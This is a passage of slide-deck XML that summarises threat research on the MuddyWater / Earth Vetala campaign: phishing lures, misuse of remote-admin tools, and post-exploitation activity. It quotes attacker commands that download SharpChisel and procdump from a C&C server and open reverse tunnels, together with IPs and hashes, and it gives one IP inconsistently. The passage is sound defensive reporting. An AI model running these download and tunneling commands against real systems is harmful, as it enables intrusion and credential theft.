            </a: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Our research found threat indicators that were connected to the same campaign identified by Anomali. Analysis indicates that Earth Vetala is still ongoing as of the publishing of this post. During this campaign, threat actors used post-exploitation tools to dump passwords, tunnel their C&amp;C communication using open-source tools, and use additional C&amp;C infrastructure to establish a persistent presence within targeted hosts and environments.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="70650"/>
            <a:ext cx="8520600" cy="537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sz="1350">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>During our research, we observed a spearphishing email allegedly from a government agency.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="Google Shape;160;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133525" y="551101"/>
            <a:ext cx="8876951" cy="4500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233975" y="0"/>
            <a:ext cx="8520600" cy="798300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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ru" sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>MuddyWater</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="763050"/>
            <a:ext cx="8520600" cy="380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ru" sz="1700">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MuddyWater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1700">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MuddyWater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.</a:t>
            </a:r>
            <a:endParaRPr sz="17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2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35325" y="35325"/>
            <a:ext cx="9108600" cy="505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The email attempts to convince recipients to click the URL and download a malicious file. We have seen that one of two files may be downloaded, one being a .PDF file and the other an .RTF file.</a:t>
            </a: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As with the spearphishing email, the lure documents' content attempts to convince the victim to click on another malicious URL and download a .ZIP file.</a:t>
            </a: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The .ZIP file contains a copy of a legitimate remote administration software developed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">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RemoteUtilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and provides remote administration capabilities, including:</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Downloading and uploading files</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Grabbing screenshots</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Browsing files and directories</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Executing and terminating processes</a:t>
            </a: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During our research, we were able to discover multiple .ZIP files used to distribute the RemoteUtilities remote administration software in the manner above, with all of these distributing the same RemoteUtilities sample. The use of this tool differentiates this particular campaign from earlier research, as in previous attacks ScreenConnect was used. Otherwise, the TTPs in use remain broadly similar.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35325"/>
            <a:ext cx="9114300" cy="126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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>RemoteUtilities Analysis</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When the RemoteUtilities software is executed, its process launches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>msiexec.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> with the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="Google Shape;171;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200" y="857463"/>
            <a:ext cx="9105900" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317400" y="1248000"/>
            <a:ext cx="486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000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RemoteUtilities Installation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38100" y="1586700"/>
            <a:ext cx="90678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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The MSI installer installs a service on the victim machine called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Utilities – Host:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3516975" y="1955050"/>
            <a:ext cx="2461750" cy="2919975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3663350" y="4804800"/>
            <a:ext cx="2169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000">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Remote Utilities Service</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt2"/>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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35325" y="49450"/>
            <a:ext cx="9071700" cy="1031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ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The service then communicates with the domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>id.remoteutilities.com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>which belongs to RemoteUtilities. This connection is related to one of its features called Internet-ID Connection. This feature allows an intermediary Internet server to broker the connection, similar to a proxy server. This allows the threat actor to connect to the Internet-ID server, which then connects to the actual RemoteUtilities host.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Google Shape;181;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119113" y="953825"/>
            <a:ext cx="6905775" cy="3836425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695125" y="4743300"/>
            <a:ext cx="19146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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id-server connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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311700" y="105900"/>
            <a:ext cx="8520600" cy="32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ru" sz="1815">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Post-Exploitation Analysis</a:t>
            </a:r>
            <a:endParaRPr sz="3300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="466300"/>
            <a:ext cx="9114300" cy="462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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>During our research, we discovered a compromised host in Saudi Arabia that used ScreenConnect remote administration software. They were targeted via a malicious .ZIP file (SHA256 hash: b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) that contained a ScreenConnect executable (SHA256 hash: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf)</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ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As noted above, the ScreenConnect executable connects to the Internet-ID server, which is located at instance-sy9at2-relay.screenconnect.com and resolves to 51.68.244.39.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The same domain was mentioned in the previous research. We then observed the threat actors interact with the compromised host using the ScreenConnect software, executing the following commands.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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cmd.exe net user /domain</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The command above allows the attacker to get all the users from the domain controller.</a:t>
            </a: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The next command executed is the following:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe -exec bypass -w 1 -file a.ps1</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This is a command to execute a PowerShell script of some kind. However, we did not have access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>a.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> file. We are not sure what functionality is provided here.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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3400"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49450" y="42400"/>
            <a:ext cx="9050700" cy="504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The next command issued is the following:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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outfile c:\programdata\SharpChisel.exe -usebasicparsing</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The command is connected to 187.236.212[.]184 and downloads a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SharpChisel.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\programdata directory. The name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SharpChisel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>chisel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. The above IP address is geolocated to a server in Iran.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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The following command then configures SharpChisel:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This directs all traffic to the localhost at port 9999 to the same remote server.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Another instance of SharpChisel with different settings is executed, this time using PowerShell using the following command line:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This time, traffic will be forwarded to the server over port 443.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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A third SharpChisel instance that connects to a different C&amp;C server at 23.95.215.100:8080 is started via the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999</a:t>
            </a:r>
            <a:endParaRPr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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35325" y="35325"/>
            <a:ext cx="9078900" cy="277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It is then configured with the following command line PowerShell command:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe C:\programdata\SharpChisel.exe client</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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 23.95.215[.]100:8080 R:8888:127.0.0.1:9999</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We believe that the threat actor was unable to configure SharpChisel to work correctly. The use of the following command provides additional evidence to support our assumption:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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powershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="156EAC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F6F6"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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outfile c:\programdata\procdump64.exe -usebasicparsing</a:t>
            </a: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350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The command connects to the C&amp;C server, downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
